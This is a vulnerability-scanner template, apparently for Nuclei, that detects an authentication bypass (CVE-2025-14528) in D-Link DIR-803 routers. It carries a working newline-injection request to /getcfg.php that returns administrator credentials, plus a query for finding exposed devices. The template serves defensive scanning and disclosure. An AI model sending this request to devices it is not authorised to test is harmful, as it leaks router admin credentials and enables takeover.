id: CVE-2025-14528

info:
  name: D-Link DIR-803 - Authentication Bypass
  author: DhiyaneshDk
  severity: high
  description: |
    An authentication bypass vulnerability exists in D-Link DIR-803 routers (firmware A1 1.04 and earlier). By manipulating the AUTHORIZED_GROUP parameter in /getcfg.php via newline injection, an attacker can retrieve XML configuration containing administrator credentials without authentication.
  impact: |
    Remote attackers can disclose sensitive information, potentially compromising device confidentiality.
  remediation: |
    Upgrade to the latest supported version or replace the device as it is no longer maintained.
  reference:
    - https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
    - https://vuldb.com/?id.335869
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-14528
    epss-score: 0.08991
    epss-percentile: 0.9276
    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="D_Link-DIR-803"
  tags: cve,cve2025,d-link,dir,auth-bypass,disclosure,vkev

http:
  - raw:
      - |
        GET /getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1' HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<entry>"
          - "<account>"
          - "<group>"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220769991fe1806fae83bc92e239ec24c2de34fad8d21be24a1c9260e6626d100df022100f5a501c36c1fe3125aa182e664e06c960dfcb3421ffaf7dba7adf3caaf135df7:922c64590222798bb761d5b6d8e72950